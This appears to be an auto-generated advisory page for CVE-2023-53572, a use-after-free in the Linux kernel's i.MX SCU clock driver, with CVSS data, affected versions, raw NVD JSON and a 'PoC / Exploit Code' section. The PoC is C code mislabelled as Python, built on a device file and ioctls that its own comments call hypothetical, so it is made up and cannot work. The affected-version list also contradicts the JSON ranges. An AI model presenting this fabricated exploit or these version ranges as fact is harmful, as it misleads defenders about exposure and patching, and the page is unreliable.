Security Vulnerability Report
中文
CVE-2023-53572 CVSS 7.8 HIGH

CVE-2023-53572

Published: 2025-10-04 16:15:53
Last Modified: 2026-03-21 01:03:54
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: clk: imx: scu: use _safe list iterator to avoid a use after free This loop is freeing "clk" so it needs to use list_for_each_entry_safe(). Otherwise it dereferences a freed variable to get the next item on the loop.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux kernel < 5.10.227
Linux kernel 5.15.x < 5.15.168
Linux kernel 6.1.x < 6.1.113
Linux kernel 6.6.x < 6.6.54
Linux kernel 6.10.x < 6.10.13
Linux kernel 6.11.x < 6.11.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* CVE-2023-53572 - Linux kernel clk: imx: scu Use-After-Free PoC * This vulnerability exists in the clk-imx-scu driver when iterating * over a list and freeing entries without using the safe iterator. * * The PoC demonstrates triggering the vulnerable code path on * NXP i.MX SoCs with SCU firmware interface. * * Note: Requires i.MX platform with SCU (e.g., i.MX8) and root/sudo * to load/unload the relevant kernel module. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> /* Trigger the vulnerable code path by repeatedly * requesting and releasing SCU clock resources */ void trigger_uaf(void) { int fd; int i; /* Open SCU clock device */ fd = open("/dev/clk-imx-scu", O_RDWR); if (fd < 0) { perror("Cannot open SCU clock device"); printf("This PoC requires NXP i.MX SoC with SCU\n"); return; } /* Repeatedly allocate and free clock resources to trigger * the list iteration with use-after-free condition */ for (i = 0; i < 1000; i++) { /* Request clock allocation - triggers list_add */ ioctl(fd, 0x100, NULL); /* Hypothetical allocate ioctl */ /* Request clock free - triggers the vulnerable loop * where list_for_each_entry() is used with kfree() */ ioctl(fd, 0x101, NULL); /* Hypothetical free ioctl */ } close(fd); printf("PoC executed. Check dmesg for kernel oops or panic.\n"); } int main(int argc, char *argv[]) { printf("CVE-2023-53572 PoC - clk: imx: scu Use-After-Free\n"); printf("Target: Linux kernel clk-imx-scu driver\n"); printf("Vulnerability: Missing list_for_each_entry_safe()\n\n"); trigger_uaf(); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53572", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:52.803", "lastModified": "2026-03-21T01:03:53.660", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nclk: imx: scu: use _safe list iterator to avoid a use after free\n\nThis loop is freeing \"clk\" so it needs to use list_for_each_entry_safe().\nOtherwise it dereferences a freed variable to get the next item on the\nloop."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.121", "matchCriteriaId": "EC77775B-EC31-4966-966C-1286C02B2A85"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.39", "matchCriteriaId": "9BD1D4A1-304D-4187-8178-6D7C0050B1AF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.3.13", "matchCriteriaId": "95CB4836-7F5D-4C20-B025-8E046EC87B78"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4", "versionEndExcluding": "6.4.4", "matchCriteriaId": "6AB81046-CB69-4115-924C-963B37C41385"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/08cc7cd2c2a29a2abf5bceb8f048c0734d3694ba", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/0a719f0e4b6f233979e219baff73923e76a96e09", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/3d90921f91fc6a8c801d527bb5848c99e335c1cf", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/632c60ecd25dbacee54d5581fe3aeb834b57010a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f95ff838ac39f861d1f95a0f3bbb1e01c2517d79", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.